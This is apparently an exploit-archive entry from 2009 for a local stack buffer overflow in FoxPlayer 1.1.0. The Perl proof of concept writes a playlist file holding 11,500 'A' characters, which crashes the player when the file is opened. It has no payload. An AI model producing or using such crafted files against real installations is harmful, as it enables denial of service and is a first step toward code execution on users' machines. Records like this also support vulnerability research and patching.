id: 6960
date: 08/06/2009
title: FoxPlayer 1.1.0 (m3u File) Local Buffer Overflow PoC
author: opt!x hacker
cves: 

====================================================
FoxPlayer 1.1.0 (m3u File) Local Buffer Overflow PoC
====================================================


#!/usr/bin/perl
# FoxPlayer 1.1.0 (m3u) local stack overlow POC
#finded by opt!x hacker  
#download : http://files.brothersoft.com/regnow/fox-player-setup.exe
my $header="#M3u";
my $crash="A" x 11500;
my $poc=$crash;
open(myfile,'>>AIDI.m3u');
print myfile $poc;



#  0day.today [2023-03-23]  #